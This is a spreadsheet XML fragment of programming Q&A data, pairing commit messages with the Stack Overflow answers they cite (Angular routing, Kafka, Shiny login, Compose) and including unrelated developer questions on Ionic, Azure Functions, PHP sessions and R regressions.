    <t>Routing and Login
Added a rudimentary navigation system (routes) and login system.
Fixed Angular - Electron route and refresh issue thanks to [http://stackoverflow.com/questions/36945864]</t>
  </si>
  <si>
    <t>I've managed to work out a solution to the Angular2 with Electron refresh issue. Props to Thorston Hans for helping us determine the solution with the most current version of Electron and Angular2. Note that we have been following along the Angular2 Tour of Heroes walkthrough in Electron.
We quickly discovered after completing most of the routing section of Tour of Heroes that refreshing the electron browser window was causing the app to not refresh the current page correctly.
We correctly assumed this had to do with the way Angular2 and Electron handled the routing. We eventually assumed either Angular2 would need to support hashbang URL's or Electron would need to support HTML5 URL routing. Seemed like the latter was not immediately achievable in Electron so we turned to Angular2 to provide us a way to get hashbang's back in the URL path.
Below is the code we used to get the routing working in Electron.
app.component.ts
import { Component }       from 'angular2/core';
import { HeroService }     from './hero.service';
import { HeroesComponent } from './heroes.component';
import { DashboardComponent } from './dashboard.component';
import { RouteConfig, ROUTER_DIRECTIVES } from 
'angular2/router';
import {Location} from 'angular2/src/platform/browser/location/location'
@RouteConfig([
  {
      path: '/heroes',
      name: 'Heroes',
      component: HeroesComponent
  },
  {
      path: '/dashboard',
      name: 'Dashboard',
      component: DashboardComponent,
      useAsDefault: true
  }
])
@Component({
    selector: 'my-app',
    template: `
    &lt;h1&gt;{{title}}&lt;/h1&gt;
    &lt;nav&gt;
        &lt;a [routerLink]="['Dashboard']"&gt;Dashboard&lt;/a&gt;
        &lt;a [routerLink]="['Heroes']"&gt;Heroes&lt;/a&gt;
    &lt;/nav&gt;
    &lt;router-outlet&gt;&lt;/router-outlet&gt;
    `,
    directives: [ROUTER_DIRECTIVES],
    providers: [
        HeroService
        ]
})
export class AppComponent {    
    title = 'Tour of Heroes';
}
Note we removed the ROUTER_PROVIDERS from the "providers" list (leaving just HeroService) and also removed it from the import statements at the beginning fo the file. We also added an import statement for Location. The idea here is to get Angular2 to use hashbang URLs.
Next is the app.ts file.
///&lt;reference path="../node_modules/angular2/typings/browser.d.ts"/&gt;
import {provide} from 'angular2/core';  
import {ROUTER_PROVIDERS} from 'angular2/router';
import {LocationStrategy} from      'angular2/src/platform/browser/location/location_strategy';
import {HashLocationStrategy} from      'angular2/src/platform/browser/location/hash_location_strategy';
import { bootstrap }    from 'angular2/platform/browser';
import { AppComponent } from './app.component';
bootstrap(AppComponent, [ROUTER_PROVIDERS, provide(LocationStrategy,
    { useClass: HashLocationStrategy })]);
This took some digging to find the right Angular2 folders which contained the exports, but there they are in all their glory. So, basically, we tell Angular2 to use a "HashLocationStrategy" when resolving URLs. We were then able to refresh the application browser window within Electron and our page refreshed as expected. Note Your index.html file does not need a &lt;base href&gt; tag when using this approach. I'm not clear on the details, but I assume the bootstrapping that occurs with HashLocationStrategy takes care of this. Hope this helps!</t>
  </si>
  <si>
    <t xml:space="preserve">We have a few projects that involve building an application that is composed of maybe 50% custom functionality, but then pulls in, say, a wiki, a forum, and other components that are "wheels" that have already been invented that we do not wish to re-write from scratch.
These third-party applications usually have their own databases, themes, and authentication systems. Getting things to work like a single-sign-on, or a common theme, or tagging/searching across entities in multiple sub-apps are pretty challenging problems, in my experience. What are some of the best practices for this kind of integration project?
Our approach, so far, has been to try and pick your components carefully, choosing ones that have a clearly defined API, preferably via HTTP (like REST or SOAP), though that isn't always possible (we haven't found a decent forum that works that way). Are there suggestions folks can give to anyone trying to do this, as I suspect many of us are more and more frequently these days?
</t>
  </si>
  <si>
    <t>C500</t>
  </si>
  <si>
    <t>properly advertise broker
thank you stack overflow 
http://stackoverflow.com/questions/28146409/kafka-unable-to-send-a-messa
ge-to-a-remote-server-using-java</t>
  </si>
  <si>
    <t>In your kafka server.properties there is a commented configuration
#advertised.host.name=&lt;Some IP&gt;
Uncomment this and add the IP of the Linux Machine in which kafka is running.
advertised.host.name=&lt;Kafka Running Machine IP&gt;
And connect from clients to &lt;Kafka Running Machine IP&gt; This should fix your issue.
EDIT
Optionally you can uncomment the
#advertised.port=9092
Also if you are listening on a different port than the default one.</t>
  </si>
  <si>
    <t xml:space="preserve">From an [external-link] with [external-link], the creator of [external-link]--an Adobe AIR application for creating mockups:
And then you started working on the
  first version Balsamiq Mockups. Was
  there any hurdles in the development
  process?
  Ha! There's always hurdles, it's part
  of the fun of coding isn't it?
  Let me think. I think I rewrote the
  foundation classes (the Model, the
  Input Manager, the base UI Component,
  etc) a few times until I was happy
  with them. First I started with each
  UI control handle the mouse events for
  moving and resizing itself, then moved
  all the mouse handling to a
  transparent InputManager canvas that
  sits on top of the view (similar to
  what I had done for Connect's
  whiteboard). I also had to learn and
  digest all the different options for
  run-time skinning before I was able to
  create a strategy that worked for my
  tool, which took a while.
Is foundation classes a common term for the core classes in a framework?
Are "Model, UI Component, Input Manager" common themes in user interface development and what do they comprise of exactly?
What does he mean when he says he "moved the mouse handling to a transparent InputManager canvas on top of the view"? What is the view and the InputManager canvas.
Why does he do runtime skinning? Can't the skinning be done before hand? What other options are available that he could have explored?
I am trying to get a handle on his design architecture.
</t>
  </si>
  <si>
    <t>C501</t>
  </si>
  <si>
    <t>simplified imports for several components
+ https://stackoverflow.com/a/70807923/3382269</t>
  </si>
  <si>
    <t>as @casimirth stated above since those components are from different files, even though on the same folder, then you need to import them separately as below
import Login from "./components/Login"
import Question from "./components/Question"
But i think i know what you're looking for, being able to import them all on one line right?
below are couple of the ways
1 .put them all on single file and use exports, since in one file only one component can use export default
// ./components/componentfile.js
export const Login = () =&gt; {...
export const Question = () =&gt; {...
then where you're using them you can import them as
import {Login, Question} from '.components/componentfile'
if one of the file is exported with default as below
const Login = () =&gt; {...
export const Question = () =&gt; {...
export default Login;
then the using them will be as below
import Login , { Question } from './components/componentfile'
2. You wish to keep this two files separately and still import on one line
then you need to add another file in components file, prefered index.js since if you name a directory without specifying a file, index.js is one being called by default
So, you components directory will have three files,
./components
   -index.js
   -login.js
   -questions.js
then without editing anything on your login.js,questions.js import them on your index.js and export them from it as below
import Login from './login'
import Question from './question'
export {Login, Question}
then where you're using them you just import them as below
import {Login, Question} from './components' //note with index.js no need to mention //it on import</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am getting following error while running this command in my ionic 3 Project&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[app-scripts] [01:08:19]  ionic-app-script task: &amp;quot;serve&amp;quot; 
[app-scripts] [01:08:19]  Error: Could not find an &amp;quot;NgModule&amp;quot; decorator in 
[app-scripts]             /Users/user/Documents/ios-full-project/src/app/app.module.ts 
[app-scripts] Error: Could not find an &amp;quot;NgModule&amp;quot; decorator in /Users/user/Documents/ios-full-project/src/app/app.module.ts
[app-scripts]     at new BuildError (/Users/user/Documents/ios-full-project/node_modules/@ionic/app-scripts/dist/util/errors.js:16:28)
[app-scripts]     at /Users/user/Documents/ios-full-project/node_modules/@ionic/app-scripts/dist/deep-linking.js:57:21
[ERROR] ionic-app-scripts has unexpectedly closed (exit code 1).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is my environment&lt;/p&gt;
&lt;p&gt;Ionic:&lt;/p&gt;
&lt;p&gt;Ionic CLI          : 6.19.0 (/Users/user/.nvm/versions/node/v14.21.3/lib/node_modules/@ionic/cli)
Ionic Framework    : ionic-angular 3.9.5
@ionic/app-scripts : 3.2.3&lt;/p&gt;
&lt;p&gt;Cordova:&lt;/p&gt;
&lt;p&gt;Cordova CLI       : not installed
Cordova Platforms : not available
Cordova Plugins   : not available&lt;/p&gt;
&lt;p&gt;Utility:&lt;/p&gt;
&lt;p&gt;cordova-res (update available: 0.15.4) : 0.13.1
native-run (update available: 2.0.1)   : 1.7.4&lt;/p&gt;
&lt;p&gt;System:&lt;/p&gt;
&lt;p&gt;ios-deploy : 1.12.2
ios-sim    : ios-sim/9.0.0 darwin-x64 node-v14.21.3
NodeJS     : v14.21.3 (/Users/user/.nvm/versions/node/v14.21.3/bin/node)
npm        : 6.14.18
OS         : macOS Unknown
Xcode      : Xcode 16.2 Build version 16C5032a&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C502</t>
  </si>
  <si>
    <t>add auto.offset.reset to the kafka consumer
This is being added in attempt to address errors that are being
experienced coming from the kafka broker. This stackoverflow question[1]
is referenced as a similar problem.
[1]:
https://stackoverflow.com/questions/34288449/spark-streaming-kafka-sparkexception-couldnt-find-leader-offsets-for-set</t>
  </si>
  <si>
    <t xml:space="preserve">You need to check 2 things:
check if this topic and partition  exists , in your case is topic is test-topic and partition is 0.
based on your code, you are trying consume message from offset 0 and it might be possible message is not available from offset 0, check what is you earliest offset and try consume from there.
Below is command to check earliest offset:
sh kafka/bin/kafka-run-class.sh kafka.tools.GetOffsetShell --broker-list "your broker list" --topic "topic name" --time -1 </t>
  </si>
  <si>
    <t xml:space="preserve">I have started design of a ColdFusion application that is entirely web based.  Not much use of Flash forms, or AJAX.  
The first version is a strict web app.   Version 2 will be a Flex front end.  
I want to design and build things so that the Flex layer can use existing logic.  It's okay if it means I have to do extra work in version 1.  I would like to harden the logic code once and not re-factor.
What are things worth considering / designing / implementing now that would greatly aid in being able to design an app in this way?
</t>
  </si>
  <si>
    <t>C503</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm running a bunch of identical logistic regression models across a variety of different treatment conditions from an experiment, and I have a handful of outcomes, so I've written a simple bit of code that loops through those and creates a dataframe of results at the end.&lt;/p&gt;
&lt;p&gt;I think my question is fairly straightforward so I'll be succinct: what is the best way to subsequently calculate average marginal effects (AME) and CIs using my same framework? Of course, if there's some completely alternative way of doing this that requires a change to my strategy, that's fine too. Ideally, at the end, my goal is to have one big dataframe with the logit coefficients and CIs alongside the AMEs and CIs.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;library(tidyverse)
library(broom)
# Simulate some data
set.seed(123)  
n_obs &amp;lt;- 500
d &amp;lt;- data.frame(
  white = sample(c(0, 1), n_obs, replace = TRUE),              # binary indicator
  gender = sample(c(&amp;quot;male&amp;quot;, &amp;quot;female&amp;quot;), n_obs, replace = TRUE),   # categorical variable
  funding_health = rnorm(n_obs, mean = 50, sd = 10),             # continuous predictor
  treat_condition = sample(c(&amp;quot;A&amp;quot;, &amp;quot;B&amp;quot;), n_obs, replace = TRUE)     # treatment condition
)
logit1 &amp;lt;- -1 + 0.5 * d$white + 0.3 * (d$gender == &amp;quot;female&amp;quot;) + 0.02 * d$funding_health
prob1 &amp;lt;- 1 / (1 + exp(-logit1))
d$outcome1 &amp;lt;- rbinom(n_obs, size = 1, prob = prob1)
logit2 &amp;lt;- -0.5 + 0.2 * d$white - 0.4 * (d$gender == &amp;quot;female&amp;quot;) + 0.03 * d$funding_health
prob2 &amp;lt;- 1 / (1 + exp(-logit2))
d$outcome2 &amp;lt;- rbinom(n_obs, size = 1, prob = prob2)
outcomes &amp;lt;- list(outcome1 = &amp;quot;Outcome 1&amp;quot;, outcome2 = &amp;quot;Outcome 2&amp;quot;)
treat_conditions_list &amp;lt;- c(&amp;quot;A&amp;quot;, &amp;quot;B&amp;quot;)
# Models
model_results &amp;lt;- expand.grid(outcome_var = names(outcomes), condition = treat_conditions_list) %&amp;gt;%
  pmap_dfr(function(outcome_var, condition) {
    mod &amp;lt;- glm(as.formula(paste(outcome_var, 
                                &amp;quot;~ factor(white) + factor(gender) + funding_health&amp;quot;)),  
               data = d,
               family = binomial,
               subset = treat_condition == condition,
               na.action = na.exclude)
    n &amp;lt;- nobs(mod)  # Number of observations used in the model
    tidy(mod, conf.int = TRUE) %&amp;gt;%
      mutate(outcome = outcomes[[outcome_var]],
             treat = condition,
             N = n)
  })
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C504</t>
  </si>
  <si>
    <t>Fix slow reading from broker by avoiding strands for blocking calls.
If a boost::asio::io_service::strand 'collides' with a strand used here for
the potentially blocking call to asyncConsumeMessage (since
MQReceiveMessageWithTimeout is blocking if no messages arrive), this means
that handlers posted to the strand can only be called when the blocking call
has finished.
Since the timeout in MQReceiveMessageWithTimeout is 100 ms, a JmsConsumer,
whose m_mqStrand collided with the one of a JmsConsumer that does not receive
any messages, receives at 10 Hz maximum.
See http://stackoverflow.com/questions/40291265/boostasio-reasoning-behind-num-implementations-for-io-servicestrand?rq=1
about 'colliding' strands.</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently building an API which will be used by a webservice. 
I was wondering what performance issues I could meet if I built my API using a large amount of static methods.
The original idea was to build expert objects which act as services.
In a single user environment this approach was great! 
But I will soon need to port this to a multi/concurrent user environment.
What kind of performance issues might i encounter with this kind of architecture?
Best regards,
Edit:
The static methods hold no static variables and have no side effects. They simply execute a normal routine where everything is instantiated. (ie. vars and objects)
</t>
  </si>
  <si>
    <t>C505</t>
  </si>
  <si>
    <t>extendin album. To be fixed: Material-UI: A component is changing the
 uncontrolled value state of Autocomplete to be controlled.
see https://stackoverflow.com/a/63300376/7362888</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following function created to list the containers of a storage account, but when I check the logs, I see the following message:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Result: FailureException: Worker was unable to load entry point
&amp;quot;app.js&amp;quot;: File does not existStack: Error: Worker was unable to load
entry point &amp;quot;app.js&amp;quot;: File does not exist    at
/azure-functions-host/workers/node/dist/src/worker-bundle.js:2:56258&lt;br /&gt;
at Generator.next ()    at o
(/azure-functions-host/workers/node/dist/src/worker-bundle.js:2:55078)
at process.processTicksAndRejections
(node:internal/process/task_queues:95:5)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is the structure of the function&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;â”œâ”€â”€ MyFunction 
    â”œâ”€â”€ app.js
    â””â”€â”€ function.json
â”œâ”€â”€ host.json
â”œâ”€â”€ local.settings.json
â”œâ”€â”€ node_modules
â”œâ”€â”€ package-lock.json
â””â”€â”€ package.json
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;app.js&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const { DefaultAzureCredential } = require('@azure/identity');
const { BlobServiceClient } = require('@azure/storage-blob');
module.exports = async function (context, req) {
  try {
    // Hardcodeamos la URL del Storage Account
    const accountUrl = 'https://xxxxxx.blob.core.windows.net';
    context.log('ConectÃ¡ndose a Storage Account en:', accountUrl);
    const credential = new DefaultAzureCredential();
    const blobServiceClient = new BlobServiceClient(accountUrl, credential);
    let containers = [];
    for await (const container of blobServiceClient.listContainers()) {
      containers.push(container.name);
    }
    context.log('Contenedores encontrados:', containers);
    context.res = {
      status: 200,
      body: { containers }
    };
  } catch (error) {
    context.log.error('Error al listar contenedores:', error);
    context.res = {
      status: 500,
      body: 'Error: ' + (error.stack || error.message)
    };
  }
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;function.json&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  &amp;quot;bindings&amp;quot;: [
    {
      &amp;quot;authLevel&amp;quot;: &amp;quot;function&amp;quot;,
      &amp;quot;type&amp;quot;: &amp;quot;httpTrigger&amp;quot;,
      &amp;quot;direction&amp;quot;: &amp;quot;in&amp;quot;,
      &amp;quot;name&amp;quot;: &amp;quot;req&amp;quot;,
      &amp;quot;methods&amp;quot;: [ &amp;quot;get&amp;quot;, &amp;quot;post&amp;quot; ]
    },
    {
      &amp;quot;type&amp;quot;: &amp;quot;http&amp;quot;,
      &amp;quot;direction&amp;quot;: &amp;quot;out&amp;quot;,
      &amp;quot;name&amp;quot;: &amp;quot;res&amp;quot;
    }
  ],
  &amp;quot;scriptFile&amp;quot;: &amp;quot;app.js&amp;quot;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I created a managed identity between the function and the storage account according to this documentation: &lt;a href="https://www.transparity.com/app-innovation/azure-functions-with-managed-identity-storage-access/" rel="nofollow noreferrer"&gt;https://www.transparity.com/app-innovation/azure-functions-with-managed-identity-storage-access/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I upload the function with the following command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;func azure functionapp publish  &amp;lt;FUNCTION_NAME&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;when i try to test the function it returns 500&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;curl -X GET &amp;quot;https://&amp;lt;FUNCTION_NAME&amp;gt;.azurewebsites.net/api/myfunction?code=RYt-
Vb5oDC0rYTASW1S4f4qsQH4fa2Km==&amp;quot; -v
&lt;/code&gt;&lt;/pre&gt;
&lt;blockquote&gt;
&lt;p&gt;HTTP/1.1 500 Internal Server Error&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>C506</t>
  </si>
  <si>
    <t>Updated for Parliament website redesign
Parliament updated their website as of 2023-03-02. It no longer allows ?page=1 etc to navigate the proposed bills.
Through help of user on Stack Overflow:
https://stackoverflow.com/questions/75728712/scraping-urls-from-a-website-that-no-longer-paginates-via-the-url?noredirect=1#comment133592569_75728712
Have redesigned code to use APIs to construct bills/pdf lists.</t>
  </si>
  <si>
    <t>Their new API (/api/data/search) is for POST requests, and it supports pageSize and page arguments.
The request below is using pageSize: 100
curl 'https://bills.parliament.nz/api/data/search' \
  -H 'authority: bills.parliament.nz' \
  -H 'accept: */*' \
  -H 'accept-language: en-US,en;q=0.9' \
  -H 'content-type: application/json; charset=utf-8' \
  -H 'origin: https://bills.parliament.nz' \
  -H 'referer: https://bills.parliament.nz/proposed-members-bills' \
  -H 'user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36' \
  --data-raw '{"documentPreset":3,"keyword":null,"selectCommittee":null,"itemType":null,"itemSubType":null,"status":[],"documentTypes":[],"beforeCommittee":null,"billStage":null,"billStages":[],"billTab":null,"billId":null,"includeBillStages":null,"subject":null,"person":null,"parliament":null,"dateFrom":null,"dateTo":null,"datePeriod":null,"restrictedFrom":null,"restrictedTo":null,"terminatedReason":null,"terminatedReasons":[],"column":4,"direction":1,"pageSize":100,"page":1}' \
  --compressed</t>
  </si>
  <si>
    <t xml:space="preserve">Background:  
We have an in house document storage system that was implemented long ago.  For whatever reason, using the database as the storage mechanism for the documents was chosen.
My question is this:  
What is the best practice for storing documents?  What are the alternatives? What are the pros and cons?  Answers do not have to be technology or platform specific, it is more of a general best practice question.
My Thoughts:
Databases are not meant for document storage.  File Systems or 3rd party Document Management systems may be of better use.  Document Storage in Databases is expensive.  Operations are slow.  Are these logic assumptions?  Perhaps this is best, but in my mind, we have better alternatives.  Could oracle BFILE's (links to document on NAS or SAN) be better than BLOB / CLOB?
Details:
Documents are various types (pdf, word, xml)
The Middle Tier code is written in .net 2.0 / c#
Documents are stored in a Oracle 10g database in BLOB with compression (NAS Storage)
File sizes rage 
The number of document is growing drastically and has no signs of slowing down
Inserts is typically is in the hunderds per hour during peak
Retreival is typically in the thousands per hour during peak
NAS storage and SAN storage is available
UPDATE (from questions below):
my background is development
there is associated meta-data about the files stored next to file in the database
</t>
  </si>
  <si>
    <t>C507</t>
  </si>
  <si>
    <t>Created LoginForm and Nav
Ran into issue
https://stackoverflow.com/questions/62694558/firebase-auth-import-source-map-warnings</t>
  </si>
  <si>
    <t>If you absolutely need the source-maps (which i don't think you really do since your solution was to disable them), you can add an
exclude rule
for firebase (or just firebase/auth). Example (building on your own):
{
    enforce: "pre",
    test: /\.js$/,
    loader: "source-map-loader",
    exclude: /node_modules\/@firebase/ //to exclude firebase from source-map
    exclude: /node_modules\/@firebase\/auth/ //to just exclude firebase auth from source-map
  },
Note:
only use one of the exclude rules above</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Upon creating my session after logging into my page i am trying to get my page to display the username you are currently logged in with, upon completing login and getting the success message my session is being created and 'Session is active' is being displayed, as checked with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (session_status() == PHP_SESSION_ACTIVE) {
  echo 'Session is active';
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I cant spot any obvious errors as to why the current username isnt being written to the screen and have also tried inverting the order by using !, but i dont recieve the current session username and instead only recieve &amp;quot;not logged in&amp;quot;&lt;/p&gt;
&lt;p&gt;My php code is:&lt;/p&gt;
&lt;p&gt;configSession.inc.php:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
session_start();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;snippet from login2.php:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; require_once &amp;quot;configSession.inc.php&amp;quot;;
        if ($errors) {
            $_SESSION['errors_login'] = $errors;
            header(&amp;quot;Location: ../login.php&amp;quot;);
            die();
        }
$newSessionID = session_create_id();
$sessionID = $newSessionID . &amp;quot;_&amp;quot;. $result[&amp;quot;id&amp;quot;];
session_id($sessionID);
$_SESSION['user_id'] = $result[&amp;quot;id&amp;quot;];
$_SESSION['user_username'] = ($username);
header(&amp;quot;Location: ../login.php?login=success&amp;quot;);
$pdo = null;
$statement = null;
die();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;loginView.inc.php:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
declare(strict_types=1);
function output_username()
{
    if (isset($_SESSION[&amp;quot;user_id&amp;quot;])) {
        echo &amp;quot;You are logged in as &amp;quot; . $_SESSION['user_username'];
    } else{
        echo &amp;quot;You are not logged in&amp;quot;;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;login.php:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
require_once 'includes/configSession.inc.php';
require_once 'includes/registerView.inc.php';
require_once 'includes/loginView.inc.php';
if (session_status() == PHP_SESSION_ACTIVE) {
  echo 'Session is active';
}
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;login.php (further down):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
output_username();
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;once successfully logged in the ouput is as follows result:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://i.sstatic.net/jvkZg0Fd.png" alt="result" /&gt;&lt;/p&gt;
&lt;p&gt;Since the session has been created i would expect login.php to echo out the current sessions username but i am only recieving 'you are not logged in'&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C508</t>
  </si>
  <si>
    <t>feat: add custom FAB for navigating to a marker in Google Maps
* became necessary as setOnMarkerClickListener stupidly disables that
* feature request for Android team is 5 years old and had 5 assignees...
* https://stackoverflow.com/a/28534469/2111778
* marker image taken from Google's Material Design icon set</t>
  </si>
  <si>
    <t>The overlay that appears when a marker is clicked, is created and destroyed on-the-spot implicitly. You can't manually show that (yet).
If you must have this functionality, you can create an overlay over your map with 2
ImageViews
, and call appropriate intents when they're clicked:
// Directions
Intent intent = new Intent(android.content.Intent.ACTION_VIEW, Uri.parse(
        "http://maps.google.com/maps?saddr=51.5, 0.125&amp;daddr=51.5, 0.15"));
startActivity(intent);
// Default google map
Intent intent = new Intent(android.content.Intent.ACTION_VIEW, Uri.parse(
        "http://maps.google.com/maps?q=loc:51.5, 0.125"));
startActivity(intent);
Note: you need to change the coordinates based on Marker's
getPosition()
and the user's location.
Now to hide the default overlay, all you need to do is return true in the
OnMarkerClickListener
. Although you'll lose the ability to show
InfoWindows
and center camera on the marker, you can imitate that simply enough:
mMap.setOnMarkerClickListener(new GoogleMap.OnMarkerClickListener() {
    @Override
    public boolean onMarkerClick(Marker marker) {
        marker.showInfoWindow();
        mMap.animateCamera(CameraUpdateFactory.newLatLng(marker.getPosition()));
        return true;
    }
});</t>
  </si>
  <si>
    <t xml:space="preserve">I'm currently working on a solution that involves the following work flow:
System sends out an email which includes some kind of identifier/sessionID.
User replies to email.
System receives reply, and parses email for sender, identifier, and user response.
System queries a sql database to retrieve some information based on the user response and then inserts some data.
System then performs a http post to a web page that belongs to another system.
So my question is, is BizTalk the correct technology for all or part of this solution? Why or why not? If not, what would be the appropriate technology be? 
In this case the business has already decided on the use BizTalk, so I would need to justify a negative answer. We have other BizTalk solutions already in place, so the product and time cost of configuring an initial BizTalk server setup does not factor here.
Thanks.
Edit: It would be fair to say that the use of BizTalk is open to discussion, more so than my question makes it seem. I'm more interested in knowing if it's an appropriate use of technology or a kludge just based on your gut feeling given the problem domain.
</t>
  </si>
  <si>
    <t>C509</t>
  </si>
  <si>
    <t>Remove switch component paddings
See https://stackoverflow.com/a/75408239/2098878 for details</t>
  </si>
  <si>
    <t>The Switch as many other components has a minimum touch target size (48.dp) for accessibility. It is applied with the minimumInteractiveComponentSize modifier.It will include extra space outside the component to ensure that they are accessible.
You can check in the doc:
Reserves at least 48.dp in size to disambiguate touch interactions if the element would measure smaller. https://m2.material.io/design/usability/accessibility.html#layout-and-typography
This uses the Material recommended minimum size of 48.dp x 48.dp, which may not the same as the system enforced minimum size. The minimum clickable / touch target size (48.dp by default) is controlled by the system via ViewConfiguration and automatically expanded at the touch input layer.
You can override this behaviour applying false to the LocalMinimumInteractiveComponentEnforcement. If it is set to false there will be no extra space.
CompositionLocalProvider(LocalMinimumInteractiveComponentEnforcement provides false) {
        Switch(
            checked = switchState,
            onCheckedChange = { switchState = !switchState },
            modifier = Modifier
                .padding(0.dp)
                .background(color = Teal200)
        )
    }
Note: LocalMinimumInteractiveComponentEnforcement requires at least M2 1.4.0-alpha04 and M3 1.1.0-alpha04. Before you can use LocalMinimumTouchTargetEnforcement in the same way.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use maps in React native for that I use the react-native-maps library, although the map is displayed correctly the problem I encounter is that when I try to generate marks it does not paint them on the map, I thought it was an error in my way of placing the data, so I used the most basic example shown in the documentation to generate a mark but it still does not work, does anyone know why this happens or why this problem is generated, very basic example code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import React from 'react';
import MapView, {Marker} from 'react-native-maps';
const Maps = () =&amp;gt; {
  return (
    &amp;lt;MapView
      style={{flex: 1}}
      initialRegion={{
        latitude: -34.391,
        longitude: 150.644,
        latitudeDelta: 0.09,
        longitudeDelta: 0.03,
      }}&amp;gt;
      &amp;lt;Marker
        description=&amp;quot;Delivery person 1&amp;quot;
        coordinate={{langitude: -34.397, longitude: 150.644}}
      /&amp;gt;
    &amp;lt;/MapView&amp;gt;
  );
};
export default Maps;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C51</t>
  </si>
  <si>
    <t>Login Original Files
http://stackoverflow.com/questions/33796585/authentication-in-shiny-app-and-multiple-pages</t>
  </si>
  <si>
    <t>Try such i think it can help to do what you want
ui :
library(shiny) library(shinydashboard) shinyUI( dashboardPage( dashboardHeader(), dashboardSidebar(), dashboardBody(
     uiOutput("page")
 )
)
)
server :
 library(shiny)
 library(shinydashboard)
 source("user.R")
 source("admin.R")
 my_username &lt;- c("test","admin")
 my_password &lt;- c("test","123")
 get_role=function(user){
   if(user=="test") {
     return("TEST")
   }else{
     return("ADMIN")
   }
 }
 get_ui=function(role){
   if(role=="TEST"){
     return(list_field_user)
   }else{
     return(list_field_admin)
   }
 }
 shinyServer(function(input, output,session) {
   USER &lt;- reactiveValues(Logged = FALSE,role=NULL)
   ui1 &lt;- function(){
     tagList(
       div(id = "login",
           wellPanel(textInput("userName", "Username"),
                     passwordInput("passwd", "Password"),
                     br(),actionButton("Login", "Log in")))
       ,tags$style(type="text/css", "#login {font-size:10px;   text-align: left;position:absolute;top: 40%;left: 50%;margin-top: -10px;margin-left: -150px;}")
     )}
   ui2 &lt;- function(){list(tabPanel("Test",get_ui(USER$role)[2:3]),get_ui(USER$role)[[1]])}
   observe({ 
     if (USER$Logged == FALSE) {
       if (!is.null(input$Login)) {
         if (input$Login &gt; 0) {
           Username &lt;- isolate(input$userName)
           Password &lt;- isolate(input$passwd)
           Id.username &lt;- which(my_username == Username)
           Id.password &lt;- which(my_password == Password)
           if (length(Id.username) &gt; 0 &amp; length(Id.password) &gt; 0) {
             if (Id.username == Id.password) {
               USER$Logged &lt;- TRUE
               USER$role=get_role(Username)
           }
         } 
       }
     }
     }
   })
   observe({
     if (USER$Logged == FALSE) {
       output$page &lt;- renderUI({
box( div(class="outer",do.call(bootstrapPage,c("",ui1())))) }) } if (USER$Logged == TRUE)    { output$page &lt;- renderUI({ box(width = 12, div(class="outer",do.call(navbarPage,c(inverse=TRUE,title = "Contratulations you got in!",ui2()))) )}) #print(ui) } }) })
user.r:
list_field_user = list(tabPanel("test2",fluidRow(column(6,numericInput("inputtest", "test", value = 0),column(6,actionButton(inputId ="test1",label ="go"))))), h1("1234"),h2("234"))
admin.r
list_field_admin = list( h1("admin"),h2("admin"))
!!! place all this files in one dir
that simple example but this can help you</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;def Axis(A, B): # RETURN A NORMALIZED NORMAL VECTOR (CHECKED)
    dx = A[0] - B[0]
    dy = A[1] - B[1]
    n = [-dy, dx]
    v = math.sqrt(dy ** 2 + dx ** 2)
    return [n[0] / v, n[1] / v]
def projections(A, B, E, r): #Should return projections perpendicular line of the edge of the 2 vertices
    n = Axis(A, B)
    A_proj, B_proj, E_proj = A[:], B[:], E[:]
    a = A_proj[0] * n[0] + A_proj[1] * n[1]
    b = B_proj[0] * n[0] + B_proj[1] * n[1]
    e = E_proj[0] * n[0] + E_proj[1] * n[1]
    F = [E_proj[0] + r * n[0], E_proj[1] + r * n[1]]
    G = [E_proj[0] - r * n[0], E_proj[1] - r * n[1]]
    for i in range(2):
        A_proj[i] = a * n[i]
        B_proj[i] = b * n[i]
    return [A_proj, B_proj, G, F]
def check_overlap(pos):
    # Extraction des points
    (x1, y1), (x2, y2) = pos[0], pos[1]
